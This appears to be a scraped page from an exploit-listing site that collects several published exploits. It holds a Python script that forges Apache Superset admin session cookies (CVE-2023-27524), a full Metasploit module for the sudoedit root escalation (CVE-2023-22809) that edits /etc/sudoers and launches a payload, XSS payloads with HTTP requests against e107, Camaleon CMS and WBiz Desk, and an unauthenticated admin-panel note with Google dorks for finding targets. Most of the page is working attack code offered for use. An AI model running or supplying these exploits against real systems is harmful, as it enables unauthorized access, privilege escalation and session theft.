Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : 1Two Ecommerce 1.0 Unauthorized administrative access Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.1two.org/ | | # Dork : Powered by 1Two Ecommerce 1.0 © | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The control panel is not protected by authentication, so it is possible to act and modify anything. [+] Use payload : /admin/ [+] http://127.0.0.1/Ventes/admin/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code># Exploit Title: e107 v2.3.2 - Reflected XSS # Date: 11/05/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 2.3.2 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - unauthorized URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php Parameters: content # POC Request: POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 1126 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: text/html, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml Response: HTTP/1.1 200 OK Date: Thu, 11 May 2023 19:38:45 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1053 Connection: close Content-Type: text/html; charset=UTF-8 Lore"/><script>alert(1)</script>bb ### XSS Reflected - Authorized URL: http://127.0.0.1/e107/e107_admin/image.php Parameters: for # POC 1 Request: GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Connection: close Response: HTTP/1.1 200 OK Date: Thu, 04 May 2023 03:07:35 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "37f107dbe6a998ecf7b71689627c2a56" Content-Length: 12420 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: hacked">bbbbb</title> <meta charset='utf-8' /> <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />  [...] <div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path="> No HTML5 support. </div> [...] # POC 2 URL: http://127.0.0.1/e107/e107_admin/newspost.php Parameters: Payload in URL Request: GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8 Connection: close Response: HTTP/1.1 200 OK Date: Fri, 05 May 2023 06:21:53 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "d127dd6a44a22e093fed60b83bf36af2" Content-Length: 72914 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>News - List - Admin Area :: hacked">bbbbb</title> <meta charset='utf-8' /> <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />  [...] <a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h"> <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ></a> [...] </code></pre>

<pre><code># Exploit Title: Apache Superset 2.0.0 - Authentication Bypass # Date: 10 May 2023 # Exploit Author: MaanVader # Vendor Homepage: https://superset.apache.org/ # Version: Apache Superset<= 2.0.1 # Tested on: 2.0.0 # CVE: CVE-2023-27524 from flask_unsign import session import requests import urllib3 import argparse import re from time import sleep from selenium import webdriver from urllib.parse import urlparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) SECRET_KEYS = [ b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1 b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 b'thisISaSECRET_1234', # deployment template b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation b'TEST_NON_DEV_SECRET' # docker compose ] def main(): parser = argparse.ArgumentParser() parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True) parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1') args = parser.parse_args() try: u = args.url.rstrip('/') + '/login/' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' } resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) if resp.status_code != 200: print(f'Error retrieving login page at {u}, status code: {resp.status_code}') return session_cookie = None for c in resp.cookies: if c.name == 'session': session_cookie = c.value break if not session_cookie: print('Error: No session cookie found') return print(f'Got session cookie: {session_cookie}') try: decoded = session.decode(session_cookie) print(f'Decoded session cookie: {decoded}') except: print('Error: Not a Flask session cookie') return match = re.search(r'"version_string": "(.*?)&#34', resp.text) if match: version = match.group(1) else: version = 'Unknown' print(f'Superset Version: {version}') for i, k in enumerate(SECRET_KEYS): cracked = session.verify(session_cookie, k) if cracked: break if not cracked: print('Failed to crack session cookie') return print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}') try: user_id = int(args.id) except: user_id = args.id forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k) print(f'Forged session cookie for user {user_id}: {forged_cookie}') u1 = args.url.rstrip('/') + '/superset/welcome' print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)") except Exception as e: print(f'Unexpected error: {e}') if __name__ == '__main__': main() </code></pre>

<pre><code># Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4 # Google Dork: intext:"Camaleon CMS is a free and open-source tool and a fexible content management system (CMS) based on Ruby on Rails" # Date: 2023-10-05 # Exploit Author: Yasin Gergin # Vendor Homepage: http://camaleon.tuzitio.com # Software Link: https://github.com/owen2345/camaleon-cms # Version: 2.7.4 # Tested on: Linux kali 6.1.0-kali7-amd64 # CVE : - --- Description --- http://127.0.0.1:3000/admin/login - Login as a Admin Under Post tab click on "Create New" While creating the post set Title as "><svg/onmouseover=alert(document.cookie)> http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent to this url -- POST DATA -- POST /admin/post_type/2/posts HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new Content-Type: application/x-www-form-urlencoded Content-Length: 666 Origin: http://127.0.0.1:3000 Connection: keep-alive Cookie: _my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D; auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1; phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D= -- POST DATA -- Then view the post you've created by clicking on "View Page" move your mouse cursor onto post title. XSS will popup. </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Sudoedit Extra Arguments Priv Esc', 'Description' => %q{ This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package. The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root privileges. Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu 22.04 and 22.10. This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and 1.9.11p3-1ubuntu1 on Ubuntu 22.10. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Matthieu Barjole', # original PoC, analysis 'Victor Cutillas' # original PoC, analysis ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'EDB', '51217' ], [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ], [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ], [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ], [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ], [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ], [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'], [ 'CVE', '2023-22809' ] ], 'DisclosureDate' => '2023-01-18', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]), OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ]), OptInt.new('TIMEOUT', [true, 'The timeout waiting for sudo commands to respond', 10]), ] end def timeout datastore['TIMEOUT'] end # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end def get_editable_file if datastore['EDITABLEFILE'].present? fail_with(Failure::BadConfig, 'EDITABLEFILE must be a file.') unless file?(datastore['EDITABLEFILE']) vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}") return datastore['EDITABLEFILE'] end # we do a rev here to reverse the order since we only want the last entry (the file name), take item 1, then rev it back so its normal. this seemed to # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E \'\$root\$|\$ALL\$|\$ALL : ALL\$\' | rev | cut -d " " -f 1 | rev') editable_file = editable_file.strip if editable_file.nil? || editable_file.empty? || editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for') return nil end return nil unless file?(editable_file) editable_file end def get_sudo_version_from_sudo package = cmd_exec('sudo --version') package = package.split(' ')[2] # Sudo version XXX begin Rex::Version.new(package) rescue ArgumentError # this happens on systems like debian 8.7.1 which doesn't have sudo Rex::Version.new(0) end end def check sys_info = get_sysinfo # Check the app is installed and the version if sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian' package = cmd_exec('dpkg -l sudo | grep \'^ii\'') package = package.split(' ')[2] # ii, package name, version, arch begin ver_no = Rex::Version.new(package) rescue ArgumentError ver_no = get_sudo_version_from_sudo end else ver_no = get_sudo_version_from_sudo end # according to CVE listing, but so much backporting... minimal_version = '1.8.0' maximum_version = '1.9.12p1' exploitable = false # backporting... so annoying. # https://ubuntu.com/security/CVE-2023-22809 if sys_info[:distro] == 'ubuntu' if sys_info[:version].include? '22.10' # kinetic exploitable = true maximum_version = '1.9.11p3-1ubuntu1.1' elsif sys_info[:version].include? '22.04' # jammy exploitable = true maximum_version = '1.9.9-1ubuntu2.2' elsif sys_info[:version].include? '20.04' # focal maximum_version = '1.8.31-1ubuntu1.4' elsif sys_info[:version].include? '18.04' # bionic maximum_version = '1.8.21p2-3ubuntu1.5' elsif sys_info[:version].include? '16.04' # xenial maximum_version = '1.8.16-0ubuntu1.10+esm1' elsif sys_info[:version].include? '14.04' # trusty maximum_version = '1.8.9p5-1ubuntu1.5+esm7' end end if ver_no == Rex::Version.new(0) return Exploit::CheckCode::Unknown('Unable to detect sudo version') end if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version) vprint_good("sudo version #{ver_no} is vulnerable") # check if theres an entry in /etc/sudoers that allows us to edit a file editable_file = get_editable_file if editable_file.nil? if exploitable return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually") else return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module") end elsif exploitable return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}") else return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploited by this module") end end CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable") end def exploit # Check if we're already root if !datastore['ForceExploit'] && is_root? fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override' end if get_editable_file.nil? fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required' end # Make sure we can write our exploit and payload to the local system unless writable?(base_dir) && directory?(base_dir) fail_with Failure::BadConfig, "#{base_dir} is not writable" end sys_info = get_sysinfo # Check the app is installed and the version fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:distro] == 'ubuntu' fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:version].include?('22.04') || sys_info[:version].include?('22.10') # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" upload_and_chmodx payload_path, generate_payload_exe register_file_for_cleanup(payload_path) @flag = Rex::Text.rand_text_alphanumeric(12) print_status 'Adding user to sudoers' # we tack on a flag so we can easily grep for this line and clean it up later command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: #{datastore['SHELL']} \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}" vprint_status("Executing command: #{command}") output = cmd_exec command, nil, timeout if output.include? '/etc/sudoers unchanged' fail_with(Failure::NoTarget, 'Failed to edit sudoers, command was unsuccessful') end if output.include? 'sudo: ignoring editor' fail_with(Failure::NotVulnerable, 'sudo is patched') end output.each_line { |line| vprint_status line.chomp } print_status('Spawning payload') # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell # also, attempting to thread off of sudo was problematic, solution was # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh # other refs that didn't work: https://askubuntu.com/questions/634620/when-using-and-sudo-on-the-first-command-is-the-second-command-run-as-sudo-t output = cmd_exec "sudo -S -b sh -c 'nohup #{payload_path} > /dev/null 2>&1 &'", nil, timeout output.each_line { |line| vprint_status line.chomp } end def on_new_session(session) if @flag session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers") flag_found = session.shell_command_token("grep '#{@flag}' /etc/sudoers") if flag_found.include? @flag print_bad("Manual cleanup is required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers") end end super end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/5641/ │ │ Vendor : WeBiz Digital │ │ Software : WBiz Desk 1.2 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /ticket.php GET parameter 'tk' is vulnerable to RXSS http://website/ticket.php?tk=d92h8"><script>alert(1)</script>ygwfb [-] Done </code></pre>